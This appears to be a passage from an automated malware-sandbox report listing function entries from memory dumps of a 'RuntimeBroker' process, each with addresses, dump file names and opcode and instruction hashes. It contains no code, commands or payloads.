                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8785caea2baebc6ed59d96132dca10c39bc7905be2f75b3235f144fd466e78d8
                                                                                    • Instruction ID: a8027426b2b8fbac964968cf66cd9ac04181c9b82a3bea45c53340e777237eb3
                                                                                    • Opcode Fuzzy Hash: 8785caea2baebc6ed59d96132dca10c39bc7905be2f75b3235f144fd466e78d8
                                                                                    • Instruction Fuzzy Hash: 98318171E1E6C99FDB55DB68C8605ACBBB0FF5B314F0400BAC149EB192CA2D7809DB51
                                                                                    Function 00007FFD347DBB13 Relevance: .1, Instructions: 97COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 320808fd3711de92e888e3f0e667657871ccb836ec14f655983396d41d9edc95
                                                                                    • Instruction ID: a2e9b319e5d99e6e0683fb173640c417536f4a32668b646b233570eec0c2e1bf
                                                                                    • Opcode Fuzzy Hash: 320808fd3711de92e888e3f0e667657871ccb836ec14f655983396d41d9edc95
                                                                                    • Instruction Fuzzy Hash: 832106A1A6F3C64FE3259634087A4F47FA0EF47310B0901BBD089C7093DD0D794A9392
                                                                                    Function 00007FFD347DD62A Relevance: .1, Instructions: 97COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 81cff813f076d31813210dba2c1d37bf908a0f1137c52282bec2cf55d0f12c97
                                                                                    • Instruction ID: 94be3a04e3cc5b00a89e97ef88119d6b67938793a1644b7e8dc6f54ad1090ccc
                                                                                    • Opcode Fuzzy Hash: 81cff813f076d31813210dba2c1d37bf908a0f1137c52282bec2cf55d0f12c97
                                                                                    • Instruction Fuzzy Hash: F331E771B1DA498FE749D75888A26A8B7D1FF86350F44017AD24DC72C3DD69B80A87C1
                                                                                    Function 00007FFD343E1171 Relevance: .1, Instructions: 96COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3526531662.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd343e0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 850dffd457d738893e5bbb4619d6dccb0bb8212b178d9ae47580b840d9bb7b5b
                                                                                    • Instruction ID: 1a9372a5d6792a57b69f4db79ec280f398b02194dc4dc564e7d210e5166e1eff
                                                                                    • Opcode Fuzzy Hash: 850dffd457d738893e5bbb4619d6dccb0bb8212b178d9ae47580b840d9bb7b5b
                                                                                    • Instruction Fuzzy Hash: D7319531A0D68A8FDF46EB64C8A59A97BF0EF57300B0905FBC009D7193DA7DA885C751
                                                                                    Function 00007FFD347D4F15 Relevance: .1, Instructions: 95COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3434794f8caa72abea5fb6414ce9be065329906ebe9166765b477e8b9a992495
                                                                                    • Instruction ID: 70c259ca315e7ec35888717b45c91056bae666f85d5d5960bc9e94f5e7e646c5
                                                                                    • Opcode Fuzzy Hash: 3434794f8caa72abea5fb6414ce9be065329906ebe9166765b477e8b9a992495
                                                                                    • Instruction Fuzzy Hash: 58314CB0A2A54ECFEB98DB54C4A15BDB7B0FF46301F58017AD20ED61A1CB3C7844AB81
                                                                                    Function 00007FFD347D7393 Relevance: .1, Instructions: 90COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7f0e88c87d70dc36a07a650ea19c6c12d4d603b6c5a0cae5a58836efc61f9ee9
                                                                                    • Instruction ID: 5ad809d21cf387839dee193f6a7cb1e6227e0bd65827b4cf2820bcbb37d357a8
                                                                                    • Opcode Fuzzy Hash: 7f0e88c87d70dc36a07a650ea19c6c12d4d603b6c5a0cae5a58836efc61f9ee9
                                                                                    • Instruction Fuzzy Hash: 11212560B1E6898FEB4AE76898A22E87B91FF57310F14017DC54DC72C3DA1CB80A83C0
                                                                                    Function 00007FFD347D8E50 Relevance: .1, Instructions: 89COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1f5f715ecbecd5005d80312a67e82ed21f639bbe9b58b7f6be9cecbb430faeb6
                                                                                    • Instruction ID: a51bee530aa494d66670e5031ff8b41d60c58f757b3a8396a416dcc3ba444a4a
                                                                                    • Opcode Fuzzy Hash: 1f5f715ecbecd5005d80312a67e82ed21f639bbe9b58b7f6be9cecbb430faeb6
                                                                                    • Instruction Fuzzy Hash: C6317250A3E4D6CEE72E931488F05B47B52DF83305B1D45B6D1A6CB4E7C52C748AA7C1
                                                                                    Function 00007FFD347D3E00 Relevance: .1, Instructions: 88COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c383e72225d3e77e83ac189466af807c910af6ac9f69a1d8eceb180d2749678c
                                                                                    • Instruction ID: 7a26a000526fd11fc70f13801ee759362744a1500f8dd0af325b6e835a87e519
                                                                                    • Opcode Fuzzy Hash: c383e72225d3e77e83ac189466af807c910af6ac9f69a1d8eceb180d2749678c
                                                                                    • Instruction Fuzzy Hash: D9315E61A2E496CBE365D32844B05747B91EF43300B1843BAD19BCB0C7C41DB849F3C1
                                                                                    Function 00007FFD347DCFE3 Relevance: .1, Instructions: 85COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 79f43a171f85301b1bf4f2879f95d9484fd4500366a877e2014daad4cf1f60b9
                                                                                    • Instruction ID: 97963a782c6c8e7da90b7fea5f74a017cacafc9835e226399ca9c6c1d38c2fa8
                                                                                    • Opcode Fuzzy Hash: 79f43a171f85301b1bf4f2879f95d9484fd4500366a877e2014daad4cf1f60b9
                                                                                    • Instruction Fuzzy Hash: 0B21B271B1964DCFDB98DB1898A56B977E1FF8A311F44017ED14FC3191CB28AC458B80
                                                                                    Function 00007FFD347D6252 Relevance: .1, Instructions: 84COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b93b7f9961a1a92099b797aecb06ba9757a9f6aa4aeb0036eca53e2277501c2e
                                                                                    • Instruction ID: 4e11c24b298c5ca61d1eb5f1103f808735ed072e5f7bd4d027bba9f8573ddff5
                                                                                    • Opcode Fuzzy Hash: b93b7f9961a1a92099b797aecb06ba9757a9f6aa4aeb0036eca53e2277501c2e
                                                                                    • Instruction Fuzzy Hash: F821D971A1891D8FDF99EB58C8A5AEDB3B1FF59311F0041AAD00EE7291CA39A9418B40
                                                                                    Function 00007FFD347D5708 Relevance: .1, Instructions: 83COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c1306d0f2e9d27c0eaa6cbaf1a6c9d24b1d6795a6561733b24139f95434a729d
                                                                                    • Instruction ID: dd2b763d6ec1b6b8b6f23ad23b33b8ff4fb229ba362ed7b0038c443d078125df
                                                                                    • Opcode Fuzzy Hash: c1306d0f2e9d27c0eaa6cbaf1a6c9d24b1d6795a6561733b24139f95434a729d
                                                                                    • Instruction Fuzzy Hash: FC216D71E2994ECFDBD4DB58D8A05EDBBB5FF4A350F60013AD10AE3281CA287805DB94
                                                                                    Function 00007FFD347DC502 Relevance: .1, Instructions: 83COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0fc7714f2decc0a5f50146ee18cbd594475dce6526f597548217e224b3191aa4
                                                                                    • Instruction ID: 922f88f3e0a1cc87a1d10e6b13c2533ff85d375b20886a27f5ca53edcb7e53cd
                                                                                    • Opcode Fuzzy Hash: 0fc7714f2decc0a5f50146ee18cbd594475dce6526f597548217e224b3191aa4
                                                                                    • Instruction Fuzzy Hash: 5F210870E1891D8FDF98DB58C8A5AEDB3B1FF99300F1041AAD00EE3291CE39A941CB40
                                                                                    Function 00007FFD347DC79A Relevance: .1, Instructions: 82COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a41e6a184563a678eec5dec9cb6acad0375b1008ebb5a05ffb84a5f4a770fd6d
                                                                                    • Instruction ID: 1c6fbcec12671adc205edb1dc2fb8f046d713b00798b36f007ce514c51e75cca
                                                                                    • Opcode Fuzzy Hash: a41e6a184563a678eec5dec9cb6acad0375b1008ebb5a05ffb84a5f4a770fd6d
                                                                                    • Instruction Fuzzy Hash: 5421E13190968DCFDB45EB24C8A4AE47BB0EF47300F1400FAD10DD7192CA39AA89DB90
                                                                                    Function 00007FFD347D64EB Relevance: .1, Instructions: 81COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a51f671693e1cec08dfee2b3fa5be8064309e1466f54d53b2d68f4492dc27ac7
                                                                                    • Instruction ID: 7bd373a5acc42c45b26dd99b3d39719f3a3bcdf3bae866533b65aa756df4e503
                                                                                    • Opcode Fuzzy Hash: a51f671693e1cec08dfee2b3fa5be8064309e1466f54d53b2d68f4492dc27ac7
                                                                                    • Instruction Fuzzy Hash: 4121E73190D68CCFCB66EB24C8A4AD47BB0EF57314F0400EAD40ED71A5CA396A89CB51
                                                                                    Function 00007FFD347D1222 Relevance: .1, Instructions: 81COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 24d998778db794bcf258d7de0eaf373fd7c2e0456a645f63d1dac666a43ef721
                                                                                    • Instruction ID: 0e63f144fc0f531e706bd8cb8b2738873d7bf8da5b4a4ab258a2a9982c03b4ae
                                                                                    • Opcode Fuzzy Hash: 24d998778db794bcf258d7de0eaf373fd7c2e0456a645f63d1dac666a43ef721
                                                                                    • Instruction Fuzzy Hash: 2421B771E1991D9FDF98EB58C4A5AEDB7F1FF69300F0401AAD14EE3291CA39A941CB40
                                                                                    Function 00007FFD347D64EA Relevance: .1, Instructions: 80COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3c2aa1a29bfd46eb6af2c31e2d7112d57ded08c6d433770766464420d5feec8a
                                                                                    • Instruction ID: 22489d9c6b00859f2fa467e6c1f1613ce7d232777e5c818a4ada74f84b7d39d3
                                                                                    • Opcode Fuzzy Hash: 3c2aa1a29bfd46eb6af2c31e2d7112d57ded08c6d433770766464420d5feec8a
                                                                                    • Instruction Fuzzy Hash: 4521D63190D68CCFCB56EB24C8A4AD87BB0EF57304F0400EAD40ED71A1CA39AA89CB51
                                                                                    Function 00007FFD347DD047 Relevance: .1, Instructions: 74COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ab5db99e73852259c5e31a2c4666ed3bb5578cb6bab960626a4a1e660606a3a1
                                                                                    • Instruction ID: 460166f1b0b696c3c45afed6aa763432a800faaa45a109047927b7145965cd48
                                                                                    • Opcode Fuzzy Hash: ab5db99e73852259c5e31a2c4666ed3bb5578cb6bab960626a4a1e660606a3a1
                                                                                    • Instruction Fuzzy Hash: 49114271708A1C8FDB98DF18D895AA9B7E2FF99311B1042AED04ED7262CB31AC45CB40
                                                                                    Function 00007FFD343F4275 Relevance: .1, Instructions: 73COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3526531662.00007FFD343F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd343f0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3444e8bef89bef208355363ebeed27c7263569bd14d954f72308ebf7e0b8407e
                                                                                    • Instruction ID: 9f1f5efb4278fd238d30035df09bb641d39872090a34c411428f5d3ac4b29f98
                                                                                    • Opcode Fuzzy Hash: 3444e8bef89bef208355363ebeed27c7263569bd14d954f72308ebf7e0b8407e
                                                                                    • Instruction Fuzzy Hash: 4B215E72F5C51B8BEB54AB98D8A56BE77E1BF71300F00053AD219D7281DF7C6901A780
                                                                                    Function 00007FFD347D8E80 Relevance: .1, Instructions: 68COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4b016b29eca20a8753af0ef180432d0297fb8ec2972164152bb23818bb9ea36a
                                                                                    • Instruction ID: 15b6f4c45c28bcaa5776f6b11acaecbf68ae05f6af33d96cae593cecd3a7343f
                                                                                    • Opcode Fuzzy Hash: 4b016b29eca20a8753af0ef180432d0297fb8ec2972164152bb23818bb9ea36a
                                                                                    • Instruction Fuzzy Hash: 3A11EB50A3D46BCAE67D9208C4F05B47253EF93305F194675D56BCB4D6C92CB889B6C0
                                                                                    Function 00007FFD347D3E30 Relevance: .1, Instructions: 68COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 468b2d1ab4050b7ac4df153fe7dc69c02d7298f9f55c2f72d03ebb3b99d82793
                                                                                    • Instruction ID: e12c9bfe9efb8caaad27af82e8695968193816dee0ad6580ff3096172a946d89
                                                                                    • Opcode Fuzzy Hash: 468b2d1ab4050b7ac4df153fe7dc69c02d7298f9f55c2f72d03ebb3b99d82793
                                                                                    • Instruction Fuzzy Hash: E411D870A3D46AC6E668D62890F09B47291EB53301B144779D19BC70C6C82DB885B7C0
                                                                                    Function 00007FFD347D21C9 Relevance: .1, Instructions: 68COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 67e24863148056681b450d183fc58f273b4fbce013c58fa89889a46558f0aac1
                                                                                    • Instruction ID: 7639ce535baba0c68bc3acda4c6b0954de52beb51aee2c2d26d0dac68268b1d5
                                                                                    • Opcode Fuzzy Hash: 67e24863148056681b450d183fc58f273b4fbce013c58fa89889a46558f0aac1
                                                                                    • Instruction Fuzzy Hash: 7B117B71B0F7899FE711C66058A41EA3791EF1B300F04017AE509D7182DE6C780B93D1
                                                                                    Function 00007FFD343E0C25 Relevance: .1, Instructions: 66COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3526531662.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd343e0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 961c50ecccd3a12d2b19c0ff3538334bf9a6a743cc42c1b007991df2e60fdb71
                                                                                    • Instruction ID: 3179053f7924f98de58a280fd3995a62d8c3f2816112d9a674ec7d7833f2bf34
                                                                                    • Opcode Fuzzy Hash: 961c50ecccd3a12d2b19c0ff3538334bf9a6a743cc42c1b007991df2e60fdb71
                                                                                    • Instruction Fuzzy Hash: 9A210432B0E2998FE312EB6898A51DE7FB0EF43324F1845B7C280DB1D2D538158A9781
                                                                                    Function 00007FFD34546062 Relevance: .1, Instructions: 66COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3530811333.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd34540000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7e9b9f1302ec387f0ef6958cb293a645ab21fdd52d44d9a80e6a5c10575249f4
                                                                                    • Instruction ID: 92b305c43c9d76f8ec20c58517f73a118594d1bb27f96708f7f60f1153d9ffa7
                                                                                    • Opcode Fuzzy Hash: 7e9b9f1302ec387f0ef6958cb293a645ab21fdd52d44d9a80e6a5c10575249f4
                                                                                    • Instruction Fuzzy Hash: 7C2168B1E099494FDFDCEB0884B5AA4B7E1FB59304B0441BFD14DE7292CE3968859B01
                                                                                    Function 00007FFD347DCFEC Relevance: .1, Instructions: 65COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c8825813460ae2fe77fe90a51c27122194a52e2f7c79e7fc9334efabee18bc62
                                                                                    • Instruction ID: 13dad60a9647576e7483b6f570934bf94f61289001445424d4b8716fce3b6d50
                                                                                    • Opcode Fuzzy Hash: c8825813460ae2fe77fe90a51c27122194a52e2f7c79e7fc9334efabee18bc62
                                                                                    • Instruction Fuzzy Hash: A611BF71B19A0CCFD798DF58D8AA6B9B7E1FF9A310B00426ED14ED72A1CB216801CB40
                                                                                    Function 00007FFD347DC209 Relevance: .1, Instructions: 61COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c447e872b42848675eb68bd6cbc209abbeedc72a593bb6c6d7961f9d8f22ffe6
                                                                                    • Instruction ID: 66a9b9f2a865a197ad6028dfa1d9d7ba24fac26c3ce1ebe8d6fef8094f3ddd36
                                                                                    • Opcode Fuzzy Hash: c447e872b42848675eb68bd6cbc209abbeedc72a593bb6c6d7961f9d8f22ffe6
                                                                                    • Instruction Fuzzy Hash: A2116D91F6F1C3CEEB655AE416F11B87A406F47610F1802B6DA8EC61C2CC4C394972D2
                                                                                    Function 00007FFD347D2D2E Relevance: .1, Instructions: 58COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 404d0028d1b4e919c34f243cfaa70c3a9822bc2a496e549ecf55c68d3ab99f06
                                                                                    • Instruction ID: b98d1fc6951d0fc28c1a57a3d550c068b73e16d6c54176091e63ea417abdd3e1
                                                                                    • Opcode Fuzzy Hash: 404d0028d1b4e919c34f243cfaa70c3a9822bc2a496e549ecf55c68d3ab99f06
                                                                                    • Instruction Fuzzy Hash: BE116B3134964D8FE705CE68E8A86E97B91FB56315F14027FDA4AC31E1CB68A526C7C0
                                                                                    Function 00007FFD347D2399 Relevance: .1, Instructions: 55COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e995e72b96e508a42f37ea3151c0c3ca00267a1373f7702d166c0e7a65f99708
                                                                                    • Instruction ID: be79bcf6bd41a460d51aa6eb57fb7f9d733520212b927c81fd273e3bb6698c05
                                                                                    • Opcode Fuzzy Hash: e995e72b96e508a42f37ea3151c0c3ca00267a1373f7702d166c0e7a65f99708
                                                                                    • Instruction Fuzzy Hash: 3001D671B499488FDB45EBA8A8A16EC77A0FF4A311F45017ED14DE72C3CA2968028780
                                                                                    Function 00007FFD3454608A Relevance: .1, Instructions: 52COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3530811333.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd34540000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: aaaae207bb12e42fbd277566c15f15ccb5125e041acc1f8d6d9066884291506a
                                                                                    • Instruction ID: 47621d3431635f1c20d348858c58c027181a025c3d68fba3c5aae33b44d85838
                                                                                    • Opcode Fuzzy Hash: aaaae207bb12e42fbd277566c15f15ccb5125e041acc1f8d6d9066884291506a
                                                                                    • Instruction Fuzzy Hash: 191142B1A099494FDFDCEB48C4B5E60B7E1FB59304B0441BAD15DE7292CD3968899B01
                                                                                    Function 00007FFD343E0C38 Relevance: .1, Instructions: 51COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3526531662.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd343e0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7edb03e22994360e141e2f834e2a56849c75503850f835ca00ed74b6a8d5a8c5
                                                                                    • Instruction ID: 71633ac4c7688aee68c77d964617aacd735d19f0551b20aea7672a14208685e2
                                                                                    • Opcode Fuzzy Hash: 7edb03e22994360e141e2f834e2a56849c75503850f835ca00ed74b6a8d5a8c5
                                                                                    • Instruction Fuzzy Hash: 3B11C232A0E7988FE702EB78D8A42DE7FB0EF43310F1944B7C280DB192D53816898780
                                                                                    Function 00007FFD349098FE Relevance: .0, Instructions: 50COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3537780170.00007FFD34900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34900000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd34900000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
